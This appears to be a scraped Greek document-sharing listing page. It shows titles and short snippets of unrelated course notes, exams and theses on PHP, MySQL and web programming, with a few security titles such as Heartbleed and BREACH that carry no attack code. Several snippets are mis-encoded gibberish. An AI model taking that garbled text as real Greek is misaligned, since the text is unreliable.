ΤΕΙ Σερρών Σχολή Τεχνολογικών Εφαρμογών, Τμήμα Πληροφορικής και Επικοινωνιών Προγραμματιστικές Εφαρμογές στο Διαδίκτυο (Θ) Τελική Εξέταση Διδάσκων: Δ. Κοτζίνος Όνοµα: Α.Μ. : Εξάµηνο : Αίθουσα Έδωσα Project
Διαβάστε περισσότεραΕργαστήριο Ανάπτυξης Εφαρμογών Βάσεων Δεδομένων. Εξάμηνο 7 ο
Εργαστήριο Ανάπτυξης Εφαρμογών Βάσεων Δεδομένων Εξάμηνο 7 ο Oracle SQL Developer An Oracle Database stores and organizes information. Oracle SQL Developer is a tool for accessing and maintaining the data
Διαβάστε περισσότερα5 η Διάλεξη: Προγραμματισμός στην πλευρά του εξυπηρετητή: προχωρημένα θέματα PHP
Σχεδίαση Εφαρμογών και Υπηρεσιών Διαδικτύου 5 η Διάλεξη: Προγραμματισμός στην πλευρά του εξυπηρετητή: προχωρημένα θέματα PHP Δρ. Απόστολος Γκάμας Διδάσκων (407/80) gkamas@uop.gr Σχεδίαση Εφαρμογών και
Διαβάστε περισσότεραΕφαρμογή Βάσης Δεδομένων για την Εθελοντική Αιμοδοσία στο ΑΤΕΙ-Θ
Εφαρμογή Βάσης Δεδομένων για την Εθελοντική Αιμοδοσία στο ΑΤΕΙ-Θ Επιβλέπων καθηγητής Δημήτρης Αχιλ. Δέρβος Πτυχιακή εργασία του Πετράκη-Πυρετζίδη Στέφανου Σκοπός Δημιουργία βάσης δεδομένων Ανάπτυξη διαδικτυακής
Διαβάστε περισσότεραHow to register an account with the Hellenic Community of Sheffield.
How to register an account with the Hellenic Community of Sheffield. (1) EN: Go to address GR: Πηγαίνετε στη διεύθυνση: http://www.helleniccommunityofsheffield.com (2) EN: At the bottom of the page, click
Διαβάστε περισσότεραΠρογραμματισμός και Συστήματα στον Παγκόσμιο Ιστό Ενότητα 3: Server Side Scripting II PHP & MySQL
Προγραμματισμός και Συστήματα στον Παγκόσμιο Ιστό Ενότητα 3: Server Side Scripting II PHP & MySQL Καθ. Ιωάννης Γαροφαλάκης Πολυτεχνική Σχολή Μηχανικών Η/Υ & Πληροφορικής Σκοποί ενότητας Σκοπός της παρούσας
Διαβάστε περισσότεραΗΛΕΚΤΡΟΝΙΚΟ ΚΑΤΑΣΤΗΜΑ
ΠΤΥΧΙΑΚΗ ΕΡΓΑΣΙΑ ΗΛΕΚΤΡΟΝΙΚΟ ΚΑΤΑΣΤΗΜΑ ΜΠΑΡΚΟΥΛΑΣ ΑΡΙΣΤΕΙΔΗΣ ΑΜ:3524 ΣΑΜΑΡΤΖΗΣ ΓΕΩΡΓΙΟΣ ΑΜ:883 ΠΕΡΙΕΧΟΜΕΝΑ ΠΕΡΙΛΗΨΗ INTERNET ΗΛΕΚΤΡΟΝΙΚΟ ΕΜΠΟΡΙΟ HTML SQL (Structured Query Language\ PHP ΣΥΜΠΕΡΑΣΜΑΤΑ ΠΕΡΙΛΗΨΗ
Διαβάστε περισσότεραΘέματα Προγραμματισμού Διαδικτύου ~ PHP ~
Θέματα Προγραμματισμού Διαδικτύου ~ PHP ~ Στελιος Σφακιανάκης Εαρινό 2019 Αυτή η εργασία χορηγείται με άδεια Creative Commons Αναφορά Δημιουργού - Μη Εμπορική Χρήση - Παρόμοια Διανομή 1 Server-side programming
Διαβάστε περισσότεραΒασικές Έννοιες Web Εφαρμογών
ΟΙΚΟΝΟΜΙΚΟ ΠΑΝΕΠΙΣΤΗΜΙΟ ΑΘΗΝΩΝ ΤΜΗΜΑ ΔΙΟΙΚΗΤΙΚΗΣ ΕΠΙΣΤΗΜΗΣ ΚΑΙ ΤΕΧΝΟΛΟΓΙΑΣ Τεχνολογίες και Εφαρμογές Διαδικτύου Βασικές Έννοιες Web Εφαρμογών Κατερίνα Πραματάρη Τεχνολογίες και Εφαρμογές Διαδικτύου Περιεχόμενα
Διαβάστε περισσότεραΡυθμίσεις εγκατάστασης ονόματος χώρου σε πίνακα ελέγχου plesk
Ρυθμίσεις εγκατάστασης ονόματος χώρου σε πίνακα ελέγχου plesk Βήμα 1: Ρυθμίσεις πριν την εγκατάσταση ονόματος χώρου στο πακέτο φιλοξενίας Από το διαχειριστικό σύστημα ονομάτων χώρου αφού αναζητήσουμε το
Διαβάστε περισσότεραΠρογραμματισμός Διαδικτύου
Πανεπιστήμιο Δυτικής Μακεδονίας Τμήμα Μηχανικών Πληροφορικής & Τηλεπικοινωνιών Προγραμματισμός Διαδικτύου Δρ. Μηνάς Δασυγένης mdasygenis@uowm.gr Πανεπιστήμιο Δυτικής Μακεδονίας 1 Άδειες Χρήσης Το παρόν
Διαβάστε περισσότεραPortSip Softphone. Ελληνικά Ι English 1/20
PortSip Softphone Ελληνικά Ι English 1/20 1. Περιεχόμενα 2. Εγκατάσταση σε Smartphone & Tablet (Android ή ios)... 1 3. Εγκατάσταση σε ηλεκτρονικό υπολογιστή (Windows ή Mac).... 5 4. Installation in Smartphone
Διαβάστε περισσότεραCVE the SSL Heartbleed bug. SSL Renegotiation Attack
CVE-2014-0160 the SSL Heartbleed bug SSL Renegotiation Attack CVE-2014-0160 the SSL Heartbleed bug Ευπαθείς εκδόσεις του OpenSSL δεν επιβεβαιώνουν SSL μηνύματα για το μέγεθος της μνήμης Bug στο OpenSSL
Διαβάστε περισσότεραΠΡΟΣΟΧΗ: Οι απαντήσεις πολλαπλής επιλογής µόνο πάνω στο ΦΥΛΛΟ ΑΠΑΝΤΗΣΕΩΝ
ΤΕΙ Σερρών Σχολή Τεχνολογικών Εφαρμογών, Τμήμα Πληροφορικής και Επικοινωνιών Προγραμματιστικές Εφαρμογές στο Διαδίκτυο (Θ) Τελική Εξέταση Διδάσκων: Δ. Κοτζίνος Όνοµα: Α.Μ. : Εξάµηνο : Αίθουσα Έδωσα Project
Διαβάστε περισσότεραΙστορία της PHP 5.4.33
PHP Τι εναι η PHP H PHP (PHP: Hypertext Preprocessor) είναι μια γλώσσα προγραμματισμού ανοικτού λογισμικού ειδικά σχεδιασμένη για δημιουργία σελίδων Web με δυναμικό περιεχόμενο. Ο κώδικας PHP ενσωματώνεται
Διαβάστε περισσότεραSocial Network : Programming on FACEBOOK
Social Network : Programming on FACEBOOK Συντελεστές: Παύλος Τούλουπος Ευθυμία Παπαδοπούλου Ξάνθη Μάρκου Κοινωνικά Δίκτυα Κοινωνικό δίκτυο προέρχεται από την ψυχολογία αφορά μια κοινωνική δομή ατόμων τα
Διαβάστε περισσότεραΕργαστήριο 9. Προγραμματιστικές Εφαρμογές στο Διαδίκτυο. Στόχος. Προετοιμασία περιβάλλοντος εργασίας
Εργαστήριο 9 Προγραμματιστικές Εφαρμογές στο Διαδίκτυο Στόχος Στόχος του εργαστηρίου είναι η εκμάθηση των βασικών εργασιών στην MySQL και η εξοικείωση με το περιβάλλον του εργαλείου διαχείρισης phpmyadmin.
Διαβάστε περισσότεραΚατανεμημένα Συστήματα. Javascript LCR example
Κατανεμημένα Συστήματα Javascript LCR example Javascript JavaScript All JavaScript is the scripting language of the Web. modern HTML pages are using JavaScript to add functionality, validate input, communicate
Διαβάστε περισσότεραΕργαστήριο Βάσεων Δεδομένων. Δικαιώματα Χρηστών Προβολές
Εργαστήριο Βάσεων Δεδομένων Δικαιώματα Χρηστών Προβολές Επικοινωνία με MySQL mysql host DB server queries results Client host Β Δ Η χρήση της mysql βασίζεται στο μοντέλο client server Remote access to
Διαβάστε περισσότεραΕργαστήριο Ανάπτυξης Εφαρμογών Βάσεων Δεδομένων. Εξάμηνο 7 ο
Εργαστήριο Ανάπτυξης Εφαρμογών Βάσεων Δεδομένων Εξάμηνο 7 ο JDBC JDBC is a set of classes and interfaces written in Java that allows Java programs to send SQL statements to a database like Oracle JDBC
Διαβάστε περισσότεραΜηχανή αναζήτησης βασισμένη σε AJAX και Soundex. Πτυχιακή Εργασία
ΒίΟΜηγανικτί Πλΐΐοοφορική Τ.Ε.Ι. ΚΑΒΑΛΑΣ Μηχανή αναζήτησης βασισμένη σε AJAX και Soundex Πτυχιακή Εργασία llai')/>oc Ντυαένο^ Επιβλέττων Κ αθηγητής: Δμ Στέλιος Παπαδάκης ΚΑΒΑΛΑ 2008 Βιοαΐίγανίκή ΠληροφορικτΙ
Διαβάστε περισσότεραThe challenges of non-stable predicates
The challenges of non-stable predicates Consider a non-stable predicate Φ encoding, say, a safety property. We want to determine whether Φ holds for our program. The challenges of non-stable predicates
Διαβάστε περισσότεραFrontend optimizations. Θεοδόσης Σουργκούνης
Frontend optimizations Θεοδόσης Σουργκούνης About me Σουργκούνης Θεοδόσης, thsourg@gmail.com Φοιτητής Ηλεκτρολόγος Μηχανικός, ΑΠΘ Frontend Web Developer Jan 2009: Kamibu www.zino.gr July 2009: Fardini
Διαβάστε περισσότεραΓιάννης Σαμωνάκης. 1 ο ΣΧΟΛΕΙΟ ΚΩΔΙΚΑ «Βασικά Θέματα Προγραμματισμού στην Ανάπτυξη Δυναμικών Διαδικτυακών Εφαρμογών» (Part 4 - PHP)
ΠΑΝΕΠΙΣΤΗΜΙΟ ΚΡΗΤΗΣ 1 ο ΣΧΟΛΕΙΟ ΚΩΔΙΚΑ «Βασικά Θέματα Προγραμματισμού στην Ανάπτυξη Δυναμικών Διαδικτυακών Εφαρμογών» (Part 4 - PHP) Γιάννης Σαμωνάκης 1 Περιεχόμενα Τι είναι η PHP Που μπορεί να χρησιμοποιηθεί
Διαβάστε περισσότεραSpecial edition of the Technical Chamber of Greece on Video Conference Services on the Internet, 2000 NUTWBCAM
NUTWBCAM A.S. DRIGAS Applied Technologies Department NCSR DEMOKRITOS Ag. Paraskevi GREECE dr@imm.demokritos.gr http://imm.demokritos.gr Το NutWBCam είναι ένα RealVideo πρόγραµµα που σας δίνει τη δυνατότητα
Διαβάστε περισσότεραΕργαστήριο 8. Προγραμματιστικές Εφαρμογές στο Διαδίκτυο
Εργαστήριο 8 Προγραμματιστικές Εφαρμογές στο Διαδίκτυο Στόχος Στόχος του εργαστηρίου είναι η εκμάθηση των βασικών προγραμματιστικών δομών της γλώσσας PHP και η δημιουργία φορμών για την επεξεργασία υποβαλλόμενων
Διαβάστε περισσότεραΔιαβάστε στο Παράρτημα Α.1 πώς θα γράψετε ένα πρόγραμμα PHP για την παροχή δεδομένων σε μορφή διαφορετική από την HTML.
Εργαστήριο #13 Από τα προηγούμενα εργαστήρια: Θα πρέπει να έχετε ολοκληρώσει το 11 ο (προσπέλαση βάσης δεδομένων μέσω PHP και 12 ο εργαστήριο (βασικές τεχνικές JavaScript στον browser). Οδηγίες Στο τελευταίο
Διαβάστε περισσότεραΠρογραμματισμός Διαδικτύου Ασκήσεις Εργαστηρίου
Προγραμματισμός Διαδικτύου Ασκήσεις Εργαστηρίου Ενότητα: ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ Νο 09 Δρ. Μηνάς Δασυγένης mdasyg@ieee.org Τμήμα Μηχανικών Πληροφορικής και Τηλεπικοινωνιών Εργαστήριο Ψηφιακών Συστημάτων και
Διαβάστε περισσότεραMCSS Medical Center Support Systems. Setup Instructions
MCSS Medical Center Support Systems Setup Instructions Author: Dr. Alexander Patelis Version: 1.5.00 Code: MCSS_IN_003 Αθήνα, Ιούνιος 2010 2006 2010 Dragon Systems MCSS_IN_003 Page 1 / 89 Πίνακας Αλλαγών
Διαβάστε περισσότεραΛευτέρης Κουμάκης ΠΟΛΥΜΕΣΙΚΕΣ ΥΠΗΡΕΣΙΕΣ ΣΤΗΝ ΥΓΕΙΑ
Παρουσίαση του μαθήματος Διαλέξεις Θεωρία: Παρασκευή 16:15 19:00 5Δ7Λ-, Γ6 Εργαστήριο: ΠΚ5 (3 τμήματα) κάθε Δευτέρα 14:15 16:00 16:15 18:00 18:15 20:00 Βιβλιογραφία Ιατρική Πληροφορική, K. Δελήμπασης &
Διαβάστε περισσότεραΕργαστήριο #10 (Ε10) 1
Εργαστήριο #10 Από τα προηγούμενα εργαστήρια......θα χρειαστείτε ορισμένες από τις οδηγίες μορφοποίησης CSS (ανατρέξτε στις εκφωνήσεις του 8 ου και 9 ου εργαστηρίου).! Οδηγίες Στη δυναμική δημιουργία ιστοσελίδων
Διαβάστε περισσότεραΘΕΜΑ ΠΤΥΧΙΑΚΗΣ : ΜΗΧΑΝΙΣΜΟΙ ΣΥΛΛΟΓΗΣ ΣΤΟΙΧΕΙΩΝ ΣΤΟ ΔΙΑΔΥΚΤΙΟ (COOKIES)
ΘΕΜΑ ΠΤΥΧΙΑΚΗΣ : ΜΗΧΑΝΙΣΜΟΙ ΣΥΛΛΟΓΗΣ ΣΤΟΙΧΕΙΩΝ ΣΤΟ ΔΙΑΔΥΚΤΙΟ (COOKIES) ΣΕΡΕΣΙΩΤΗ ΜΑΡΙΑ ΕΞΑΜΗΝΟ : ΠΤΥΧΙΟ Α.Μ 1999 ΥΠΕΥΘΥΝΟΣ ΚΑΘΗΓΗΤΗΣ κος ΛΕΩΝΙΔΑΣ ΤΣΙΑΝΤΗΣ ΔΩΡΟ -ΕΚΠΛΗΞΗ COOKIES ΤΙ ΕΙΝΑΙ ΤΑ COOKIES ΕΙΝΑΙ
Διαβάστε περισσότεραΓιώργος Σπηλιώτης IT Consultant
Γιώργος Σπηλιώτης IT Consultant Έκτακτη Είδηση! HEARTBleed OpenSSL v.1.0.1 έως v.1.0.1f Apache & Nginx περίπου 60% των sites Ζητάμε echo 64bytes για Block 1 byte Λάθος κατά το implementation του echo Τι
Διαβάστε περισσότεραΚΥΠΡΙΑΚΗ ΕΤΑΙΡΕΙΑ ΠΛΗΡΟΦΟΡΙΚΗΣ CYPRUS COMPUTER SOCIETY ΠΑΓΚΥΠΡΙΟΣ ΜΑΘΗΤΙΚΟΣ ΔΙΑΓΩΝΙΣΜΟΣ ΠΛΗΡΟΦΟΡΙΚΗΣ 24/3/2007
Οδηγίες: Να απαντηθούν όλες οι ερωτήσεις. Όλοι οι αριθμοί που αναφέρονται σε όλα τα ερωτήματα μικρότεροι του 10000 εκτός αν ορίζεται διαφορετικά στη διατύπωση του προβλήματος. Αν κάπου κάνετε κάποιες υποθέσεις
Διαβάστε περισσότεραΓΡΑΜΜΙΚΟΣ & ΔΙΚΤΥΑΚΟΣ ΠΡΟΓΡΑΜΜΑΤΙΣΜΟΣ
ΓΡΑΜΜΙΚΟΣ & ΔΙΚΤΥΑΚΟΣ ΠΡΟΓΡΑΜΜΑΤΙΣΜΟΣ Ενότητα 12: Συνοπτική Παρουσίαση Ανάπτυξης Κώδικα με το Matlab Σαμαράς Νικόλαος Άδειες Χρήσης Το παρόν εκπαιδευτικό υλικό υπόκειται σε άδειες χρήσης Creative Commons.
Διαβάστε περισσότεραΚΥΠΡΙΑΚΗ ΕΤΑΙΡΕΙΑ ΠΛΗΡΟΦΟΡΙΚΗΣ CYPRUS COMPUTER SOCIETY ΠΑΓΚΥΠΡΙΟΣ ΜΑΘΗΤΙΚΟΣ ΔΙΑΓΩΝΙΣΜΟΣ ΠΛΗΡΟΦΟΡΙΚΗΣ 19/5/2007
Οδηγίες: Να απαντηθούν όλες οι ερωτήσεις. Αν κάπου κάνετε κάποιες υποθέσεις να αναφερθούν στη σχετική ερώτηση. Όλα τα αρχεία που αναφέρονται στα προβλήματα βρίσκονται στον ίδιο φάκελο με το εκτελέσιμο
Διαβάστε περισσότεραΜΕΡΟΣ ΠΡΩΤΟ: Θεωρητική Προσέγγιση...15
ΠΕΡΙΕΧΟΜΕΝΑ Πρόλογος του συγγραφέα...11 Πρόλογος του καθηγητή Γεωργίου Δουκίδη...13 ΜΕΡΟΣ ΠΡΩΤΟ: Θεωρητική Προσέγγιση...15 ΚΕΦΑΛΑΙΟ 1. Η ΕΠΙΧΕΙΡΗΣΗ...17 Ορισμός της έννοιας της επιχείρησης και οι μορφές
Διαβάστε περισσότεραΤεχνολογίες Διαδικτύου
ECE_Y210 Εισαγωγή στην Επιστήμη του Ηλεκτρολόγου Μηχανικού Τεχνολογίες Διαδικτύου Νικόλαος Αβούρης hci.ece.upatras.gr/avouris 1 Αντικείμενο της ενότητας Η μελέτη τεχνολογιών ανάπτυξης εφαρμογών στο διαδίκτυο,
Διαβάστε περισσότεραΔΝΓΔΙΚΣΙΚΔ ΑΠΑΝΣΗΔΙ 3 εο ΓΡΑΠΣΗ ΔΡΓΑΙΑ 2003-2004
Β ΣΟΜΟ, ΚΔΦΑΛΑΙΑ 1 3 ΔΝΓΔΙΚΣΙΚΔ ΑΠΑΝΣΗΔΙ 3 εο ΓΡΑΠΣΗ ΔΡΓΑΙΑ 2003-2004 Τπνεξγαζία 1 (25 %) Ζ IANA (www.iana.org) είλαη έλαο κε θεξδνζθνπηθόο νξγαληζκόο πνπ είλαη ππεύζπλε γηα ηελ θξάηεζε έγθπξσλ εγγξαθώλ
Διαβάστε περισσότεραΑΝΑΠΤΥΞΗ ΕΦΑΡΜΟΓΩΝ ΜΕ ΧΡΗΣΗ PHP
Αντώνης Χρυσόπουλος Κατερίνα Κυπριώτη Στέλιος Μόσχογλου Θεοδόσης Σουργκούνης ΑΝΑΠΤΥΞΗ ΕΦΑΡΜΟΓΩΝ ΜΕ ΧΡΗΣΗ PHP Για να γίνουμε όλοι καλύτεροι άνθρωποι Τι έχει το μενού σήμερα??? 1. Τι είναι η PHP??? Τι είναι
Διαβάστε περισσότεραΜΕΤΑΠΤΥΧΙΑΚΗ ΔΙΠΛΩΜΑΤΙΚΗ ΕΡΓΑΣΙΑ
ΠΑΝΕΠΙΣΤΗΜΙΟ ΠΕΙΡΑΙΩΣ ΤΜΗΜΑ ΨΗΦΙΑΚΩΝ ΣΥΣΤΗΜΑΤΩΝ Π.Μ.Σ Τεχνοοικονομική Διοίκηση & Ασφάλεια Ψηφιακών Συστημάτων ΜΕΤΑΠΤΥΧΙΑΚΗ ΔΙΠΛΩΜΑΤΙΚΗ ΕΡΓΑΣΙΑ Τίτλος : CLIENT- SIDE ATTACKS ΑΝΤΩΝΗΣ ΣΤΑΥΡΟΠΟΥΛΟΣ ΜΤΕ 1333
Διαβάστε περισσότεραΕργαλεία ανάπτυξης εφαρμογών internet Ι
IEK ΟΑΕΔ ΚΑΛΑΜΑΤΑΣ ΤΕΧΝΙΚΟΣ ΕΦΑΡΜΟΓΩΝ ΠΛΗΟΦΟΡΙΚΗΣ Εργαλεία ανάπτυξης εφαρμογών internet Ι Διδάσκουσα: Κανελλοπούλου Χριστίνα ΠΕ19 Πληροφορικής Εργαλεία και τεχνικές από την πλευρά του πελάτη Java Applet
Διαβάστε περισσότεραΕργαστήριο βάσεων δεδομένων. MySQL Stored Procedures
Εργαστήριο βάσεων δεδομένων MySQL Stored Procedures Stored Procedures Μια store procedure είναι μια διαδικασία. Είναι ένα πρόγραμμα που αποτελείται από SQL εντολές. Αποθηκεύεται και εκτελείται στον database
Διαβάστε περισσότεραΒΑΣΕΙΣ ΔΕΔΟΜΕΝΩΝ. Πανεπιστήμιο Πειραιώς Τμήμα Ψηφιακών Συστημάτων Μανουσόπουλος Χρήστος
ΒΑΣΕΙΣ ΔΕΔΟΜΕΝΩΝ Πανεπιστήμιο Πειραιώς Τμήμα Ψηφιακών Συστημάτων Μανουσόπουλος Χρήστος cman@unipi.gr Δοσοληψίες Concurrent Data Access (Ταυτόχρονη Πρόσβαση σε Δεδομένα) Συνήθως πολλοί χρήστες έχουν ταυτόχρονη
Διαβάστε περισσότεραΗY335: Δίκτυα Υπολογιστών Χειμερινό Εξάμηνο Τμήμα Επιστήμης Υπολογιστών Πανεπιστήμιο Κρήτης Διδάσκουσα: Μαρία Παπαδοπούλη
ΗY335: Δίκτυα Υπολογιστών Χειμερινό Εξάμηνο 2012-2013 Τμήμα Επιστήμης Υπολογιστών Πανεπιστήμιο Κρήτης Διδάσκουσα: Μαρία Παπαδοπούλη Project 2012-2013 Υλοποίηση ενός chat server-client Παράδοση: 7/2/2013
Διαβάστε περισσότεραΑΛΕΞΑΝΔΡΕΙΟ Τ.Ε.Ι. ΘΕΣΣΑΛΟΝΙΚΗΣ ΣΧΟΛΗ ΤΕΧΝΟΛΟΓΙΚΩΝ ΕΦΑΡΜΟΓΩΝ ΤΜΗΜΑ ΠΛΗΡΟΦΟΡΙΚΗΣ
ΑΛΕΞΑΝΔΡΕΙΟ Τ.Ε.Ι. ΘΕΣΣΑΛΟΝΙΚΗΣ ΣΧΟΛΗ ΤΕΧΝΟΛΟΓΙΚΩΝ ΕΦΑΡΜΟΓΩΝ ΤΜΗΜΑ ΠΛΗΡΟΦΟΡΙΚΗΣ Πτυχιακή Εργασία Φοιτητής:
Διαβάστε περισσότεραΠΑΝΔΠΙΣΗΜΙΟ ΜΑΚΔΓΟΝΙΑ ΠΡΟΓΡΑΜΜΑ ΜΔΣΑΠΣΤΥΙΑΚΧΝ ΠΟΤΓΧΝ ΣΜΗΜΑΣΟ ΔΦΑΡΜΟΜΔΝΗ ΠΛΗΡΟΦΟΡΙΚΗ
ΠΑΝΔΠΙΣΗΜΙΟ ΜΑΚΔΓΟΝΙΑ ΠΡΟΓΡΑΜΜΑ ΜΔΣΑΠΣΤΥΙΑΚΧΝ ΠΟΤΓΧΝ ΣΜΗΜΑΣΟ ΔΦΑΡΜΟΜΔΝΗ ΠΛΗΡΟΦΟΡΙΚΗ ΑΝΑΠΣΤΞΗ ΓΤΝΑΜΙΚΗ ΙΣΟΔΛΙΓΑ ΓΙΑ ΣΟ ΓΔΝΙΚΟ ΚΑΣΑΣΗΜΑ ΚΡΑΣΗΗ ΓΡΔΒΔΝΧΝ ΜΔ ΣΗ ΒΟΗΘΔΙΑ PHP MYSQL Γηπισκαηηθή Δξγαζία ηνπ Υξήζηνπ
Διαβάστε περισσότεραΑ.Τ.Ε.Ι. ΚΑΒΑΛΑΣ ΠΤΥΧΙΑΚΗ ΕΡΓΑΣΙΑ
σελ. 1 Α.Τ.Ε.Ι. ΚΑΒΑΛΑΣ ΤΜΗΜΑ ΒΙΟΜΗΧΑΝΙΚΗΣ ΠΛΗΡΟΦΟΡΙΚΗΣ ΠΤΥΧΙΑΚΗ ΕΡΓΑΣΙΑ ΔΙΑΧΕΙΡΙΣΗ ΧΡΗΣΤΩΝ ΔΙΚΤΥΟΥ ΜΕΣΩ ΙΣΤΟΣΕΛΙΔΑΣ ΕΠΙΒΛΕΠΩΝ ΚΑΘΗΓΗΤΗΣ ΤΣΕΤΣΟΣ ΚΩΝΣΤΑΝΤΙΝΟΣ ΣΠΟΥΔΑΣΤΕΣ ΣΑΡΗΜΑΝΩΛΗΣ ΧΡΗΣΤΟΣ ΚΟΡΚΟΥ ΕΥΑΓΓΕΛΙΑ
Διαβάστε περισσότεραΠρογραμματισμός Διαδικτύου Ασκήσεις Εργαστηρίου
Προγραμματισμός Διαδικτύου Ασκήσεις Εργαστηρίου Ενότητα: ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ Νο 08 Δρ. Μηνάς Δασυγένης mdasyg@ieee.org Τμήμα Μηχανικών Πληροφορικής και Τηλεπικοινωνιών Εργαστήριο Ψηφιακών Συστημάτων και
Διαβάστε περισσότεραΕΞΕΤΑΣΤΕΑ ΥΛΗ (SYLLABUS) ADVANCED σχεδιασμός ιστοσελίδας ΕΚΔΟΣΗ 1.0. Σόλωνος 108,Τηλ Φαξ
ΕΞΕΤΑΣΤΕΑ ΥΛΗ (SYLLABUS) ADVANCED σχεδιασμός ιστοσελίδας ΕΚΔΟΣΗ 1.0 ΤΙ ΕΙΝΑΙ ΤΟ ADVANCED Οι Advanced θεματικές ενότητες είναι είναι κατάλληλες για άτομα που επιθυμούν να συνεχίσουν σπουδές στο χώρο της
Διαβάστε περισσότεραΠΑΝΕΠΙΣΤΗΜΙΟ ΙΩΑΝΝΙΝΩΝ ΤΜΗΜΑ ΜΑΘΗΜΑΤΙΚΩΝ
ΠΑΝΕΠΙΣΤΗΜΙΟ ΙΩΑΝΝΙΝΩΝ ΤΜΗΜΑ ΜΑΘΗΜΑΤΙΚΩΝ ΕΡΓΑΣΤΗΡΙΟ ΒΑΣΕΩΝ Ε ΟΜΕΝΩΝ ΜΕΡΟΣ ΠΕΜΠΤΟ Triggers, Stored procedures Γιώργος Μαρκοµανώλης Περιεχόµενα Triggers-Ενηµέρωση δεδοµένων άλλων πινάκων... 1 Ασφάλεια...
Διαβάστε περισσότερα. Εργαστήριο Βάσεων Δεδομένων. Triggers
Εργαστήριο Βάσεων Δεδομένων Triggers Triggers: Βασικές Έννοιες Ένας trigger είναι ένα κομμάτι κώδικα, μια ρουτίνα Συνδέεται με ένα συγκεκριμένο πίνακα Καλείται όταν συμβεί ένα γεγονός στον πίνακα Συχνές
Διαβάστε περισσότεραΜΕΤΑΦΟΡΑ ΑΡΧΕΙΩΝ FTP
ΜΕΤΑΦΟΡΑ ΑΡΧΕΙΩΝ FTP Το FTP (File Transfer Protocol) είναι το εξειδικευμένο πρωτόκολλο μεταφοράς αρχείων στα σύγχρονα δίκτυα δεδομένων όπως το Διαδίκτυο. Δίνει τη δυνατότητα μεταφοράς αρχείων από τον υπολογιστή
Διαβάστε περισσότεραTEC610 Δυναμικές Εφαρμογές Διαδικτύου (ΣΤ εξάμηνο)
TEC610 (ΣΤ εξάμηνο) Διδάσκων: Ανδρέας Γιαννακουλόπουλος Εαρινό εξάμηνο Χρηματοδότηση Το παρόν εκπαιδευτικό υλικό έχει αναπτυχθεί στα πλαίσια του εκπαιδευτικού έργου του διδάσκοντα. Το έργο «Ανοικτά Ακαδημαϊκά
Διαβάστε περισσότεραΥλοποίηση Δικτυακών Υποδομών και Υπηρεσιών: Web εφαρμογή με χρήση LDAP και SMTP Server
Υλοποίηση Δικτυακών Υποδομών και Υπηρεσιών: Web εφαρμογή με χρήση LDAP και SMTP Server Πανεπιστήμιο Πελοποννήσου Τμήμα Επιστήμης & Τεχνολογίας Τηλεπικοινωνιών Ευάγγελος Α. Κοσμάτος Αρχιτεκτονική εφαρμογής
Διαβάστε περισσότεραdatabases linux - terminal (linux / windows terminal)
databases linux - terminal (linux / windows terminal) 1) ανοίγουμε την mysql -> $ mysql -u root -p (enter) password (enter) TIP: αν κατά την εντολή αυτή μας γράψει, ERROR 2002 (HY000): Can't connect to
Διαβάστε περισσότεραVBA ΣΤΟ WORD. 1. Συχνά, όταν ήθελα να δώσω ένα φυλλάδιο εργασίας με ασκήσεις στους μαθητές έκανα το εξής: Version 25-7-2015 ΗΜΙΤΕΛΗΣ!!!!
VBA ΣΤΟ WORD Version 25-7-2015 ΗΜΙΤΕΛΗΣ!!!! Μου παρουσιάστηκαν δύο θέματα. 1. Συχνά, όταν ήθελα να δώσω ένα φυλλάδιο εργασίας με ασκήσεις στους μαθητές έκανα το εξής: Εγραφα σε ένα αρχείο του Word τις
Διαβάστε περισσότεραΕπίθεση BREACH. Διονύσης Ζήνδρος @dionyziz
Επίθεση BREACH Διονύσης Ζήνδρος @dionyziz Σύνοψη Τεχνικές λεπτομέρειες Threat model / υποθέσεις Proof of concept Αποφυγή Κωδικοποίηση Huffman David Huffman (1951) Μία μέθοδος συμπίεσης Κάθε byte αντικαθίσταται
Διαβάστε περισσότεραPaybybank RESTful API GUIDE
Paybybank RESTful API GUIDE Α. Paybybank API Documentation Για να χρησιμοποιήσετε το Paybybank API περιβάλλον (Documentation/PLAYGROUND), χρειάζεται να δημιουργήσετε ένα λογαριασμό, καταχωρώντας ένα έγκυρο
Διαβάστε περισσότεραA browser-based digital signing solution over the web
A browser-based digital signing solution over the web Fotis Loukos Charalampos Tsipizidis Dimitris Daskopoulos The problem Contents Proposed solution Architecture Native Messaging Host Native Messaging
Διαβάστε περισσότεραΙατρική Πληροφορική. Δρ. Π. ΑΣΒΕΣΤΑΣ ΤΜΗΜΑ ΜΗΧΑΝΙΚΩΝ ΒΙΟΪΑΤΡΙΚΗΣ ΤΕΧΝΟΛΟΓΙΑΣ Τ.Ε.
Ιατρική Πληροφορική Δρ. Π. ΑΣΒΕΣΤΑΣ ΤΜΗΜΑ ΜΗΧΑΝΙΚΩΝ ΒΙΟΪΑΤΡΙΚΗΣ ΤΕΧΝΟΛΟΓΙΑΣ Τ.Ε. Χρήσιμοι Σύνδεσμοι Σημειώσεις μαθήματος: http://medisp.bme.teiath.gr/eclass/courses/tio103/ https://eclass.teiath.gr/courses/tio100/
Διαβάστε περισσότερα